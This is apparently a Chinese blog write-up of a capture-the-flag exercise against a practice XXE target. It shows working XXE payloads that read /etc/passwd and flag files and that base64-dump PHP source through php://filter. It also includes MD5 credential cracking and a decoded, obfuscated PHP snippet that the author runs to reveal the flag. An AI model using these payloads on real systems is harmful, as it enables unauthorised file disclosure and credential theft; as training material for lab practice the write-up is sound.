(打靶)xxe渗透之Vulhub-XXE靶机

前期

话不多说
先来一波信息收集
既然这周的任务是xxe漏洞
直接百度先学习一下https://www.cnblogs.com/zhaijiahui/p/9147595.html#autoid-0-0-0

但是只看文章感觉差了点意思
于是去找了点视频想把这玩意研究透彻点
最终理解的还行 留下了下方两个笔记
https://app.yinxiang.com/fx/9c20b6a4-3253-4887-aff0-823642768628
https://app.yinxiang.com/fx/68ae4766-f839-409f-a142-7ce88569264d


开始

本来自己装的xxe已经好了

结果协会把靶机搭建好了
那就可以直接开日http://xxe.404sec.com/

因为这里他给出了靶机地址
那就没有必要内网扫一波靶机地址了(nmap -Sp 不过这样还要ipconfig一波用一些图形化的小工具更加快)
直接上御剑
1

访问康康

Image111.png
在robots.txt中读到了一个/xxe/和一个admin.php
Image3.png

xxe漏洞检测

惯例抓包,发去repeater
之后因为这题题目提示是xxe

<?xml version="1.0" encoding="UTF-8"?>  <!DOCTYPE ANY [  <!ENTITY name "you are didi">]> <root>&name;</root>

如果页面输出了you are didi,说明xml文件可以被解析。
看到的结果是
和我们随意发包返回的包是不一样的
Image6.png

还是爆出了点信息



这里做到 中途顺路看到了另外一个以xxe漏洞出题的CTF题目 先顺路去写了那题
http://web.jarvisoj.com:9882/
Image7.png

打开查看界面
Image8.png
打开查看源代码信息
Image9.png

抓包发包
Image10.png

先修改Content-Type: application/xml

发送根据源码和题目提示编写的payload

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY iDucKing SYSTEM "file:///home/ctf/flag.txt" >]> <abc>&iDucKing;</abc>

Image222.png



继续回来日http://xxe.404sec.com//xxe/

Image12.png
抓包发包之后
可以看到
他这里已经有了xml的标志信息和版本信息
直接上payload

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE lwh [ <!ELEMENT lwh ANY > <!ENTITY iDucKing SYSTEM "file:///etc/passwd"> ]> <root><name>&iDucKing;</name>

这里要特别注意一点
Image333.png
原因在下方图片中有解释
Image13.png
返回结果:
Image14.png

继续爆出更多有用信息:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE lwh [ <!ELEMENT lwh ANY > <!ENTITY iDucKing SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]> <root><name>&iDucKing;</name><password>1111</password></root>

回显如下:
Image15.png
发包到Decoder解密一下
Image16.png
发现username和password
if ($_POST[‘username’] == ‘administhebest’ && md5($_POST[‘password’]) == ‘e6e061838856bf47e1de730719fb2609’)
MD5解密安排一下
得到:admin@123
Image17.png
登录发现不对
说明username和password不是用在这里的
再回去读一下刚刚得到的信息
Image18.png
发现了一个adminlog.php
打开一看
Image19.png
感觉是找对地方了
administhebest
admin@123
账号密码再安排一波
Image20.png
显示登录成功
并且有flag字样出现
说明离日下来不远了
Image21.png
打开发现没得东西
但是有个很眼熟的 /flagmeout.php
我又回去看了一下刚刚base64出来的东西
Image22.png
给我抓到了
果然有点东西
Image23.png
但是打开发现没有东西
直接查看源代码
Image24.png
这就又出来了一段MD5加密—>

至于这个/flagmeout.php是否要登录之后才能查看到信息
这个我就暂时没有深究它
先解密一波再说
这里是base32加密
Image25.png
又是套娃题目
base64再解密一波
Image26.png
/etc/.flag.php
Image27.png
显示not found
这里我想到了用xxe来试试
可能是服务器上的一个文件
要用xxe的方式来爆出

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE lwh [ <!ELEMENT lwh ANY > <!ENTITY iDucKing SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php"> ]> <root><name>&iDucKing;</name><password>1111</password></root>

Image28.png
直接发到Decoder模块
Image29.png
出来一段新的编码
百度啥也没有
直接上Google
Image30.png
Google还是猛的呀
年轻人不讲武德
Image31.png

 $_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);

按照Google的说法
我们对编码进行一些修改

<?php 
    $_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_); 
    ?>

打开我的本地环境win7(专门本地调试网站的)
整一下看看出来什么
Image32.png

okk

回头看了一下
https://app.yinxiang.com/fx/7dfc4ac2-b2cd-46e7-b3df-19b417a00858
发现
这人做题的时候没有好好运用好自己得到的信息(第一次爆出的文件里面真的好多东西)
不过也成功写出来了(说明别人np啊)
还有百度的力量是有限的(JOJO)
有事下次直接Google去

相关推荐

发表评论

路人甲

网友评论(0)